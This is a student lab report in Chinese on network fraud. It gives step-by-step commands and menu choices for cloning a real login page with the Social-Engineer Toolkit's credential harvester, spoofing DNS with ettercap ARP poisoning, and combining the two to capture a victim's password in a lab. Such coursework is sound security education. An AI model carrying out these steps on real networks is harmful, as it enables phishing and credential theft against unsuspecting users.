1. 程式人生 > 其它 >實驗七 網路欺詐與防範 20192422 李俊潔

實驗七 網路欺詐與防範 20192422 李俊潔

實驗七 網路欺詐與防範

一.實驗內容及要求

本實踐的目標理解常用網路欺詐背後的原理,以提高防範意識,並提出具體防範方法。具體實踐有

(1)簡單應用SET工具建立冒名網站

(2)ettercap DNS spoof

(3)結合應用兩種技術,用DNS spoof引導特定訪問到冒名網站。

二.實驗過程

任務一 簡單應用SET工具建立冒名網站

首先我們檢視80埠是否被佔用(實驗中需要使用http服務,因此需要使用到80埠)
netstat -tupln |grep 80//可見80埠並未被佔用

sudo vim /etc/apache2/ports.conf//修改Apache的埠檔案,檢視埠為80

systemctl start apache2//開啟Apache服務


setoolkit//命令開啟SET工具

1 Social-Engineering Attacks//社會工程學攻擊
2 Penetration Testing (Fast-Track)//滲透測試(快速)
3 Third Party Modules//第三模組攻擊
4 Update the Social-Engineer Toolkit//更新社會工程師工具包
5 Update SET configuration//更新設定配置
6 Help, Credits, and About//幫助,信用和關於
7 Exit the Social-Engineer Toolkit//退出Social-Engineer Toolkit
輸入1

輸入2
Website Attack Vectors//網站攻擊向量

輸入3
Credential Harvester Attack Method//證書收割者攻擊方法

輸入2
Site Cloner——網站克隆
輸入攻擊機ip地址
192.168.56.107

輸入被克隆的網站的URL:
http://login.kaixin001.com/

在靶機(linux kali)的瀏覽器中輸入攻擊機的IP: 192.168.227.132 ,即可看到被克隆的網頁,kali中也可看到相應反饋。

可以看到我輸入的使用者名稱和密碼都被截獲了

任務二 ettercap DNS spoof

ifconfig檢視網路資訊,橋接網絡卡對應的網絡卡名稱為eth3,IP為192.168.1.218

ifconfig eth3 promisc//將Kali的橋接網絡卡改為混雜模式
編輯ettercap的DNS表,輸入命令vi /etc/ettercap/etter.dns。
在最後追加一條DNS記錄:www.tykd.com A 192.168.1.218,如下圖

靶機IP為192.168.1.112,閘道器為192.168.1.1

使用命令ping www.tykd.comDNS解析出的IP為47.56.157.205。

Kali中
ettercap -G//開啟ettercap,選擇eth3,即可監聽eth3網絡卡
選擇“Hosts”——“Scan for hosts”掃描區域網中的活躍IP

將閘道器IP加入Target1,將靶機IP加入Target2。

選擇“Plugins”——“Manage plugins”,然後找到dns_spoof雙擊該選項啟用該外掛。

選項應用ARP欺騙

靶機上
ipconfig /flushdns//重新整理DNS快取
ping www.tykd.com //檢查此時的IP地址
可以發現,靶機的DNS解析出的地址為192.168.1.218,DNS欺騙成功

任務三 結合應用兩種技術,用DNS spoof引導特定訪問到冒名網站

將中任務一中設定的IP地址更換為192.168.1.218

在靶機上訪問http://www.tykd.com/User/login/ ,輸入使用者名稱和密碼,可以看見kali成功截獲了相關資訊

三.問題及解決方案
對於任務三,靶機無法連線網站,即訪問http://www.tykd.com/User/login/
解決方法 關閉防火牆
四.實驗感想
通過本次實驗,我簡單學會了應用SET工具和ettercap工具實現簡單的網站欺騙,同時這也對自身的網上安全意識有了一定的強化,令我以後上網時有了更高的防範意識,以及提前做好安全防範措施。
感想本次實驗中老師的指導,同學的幫助。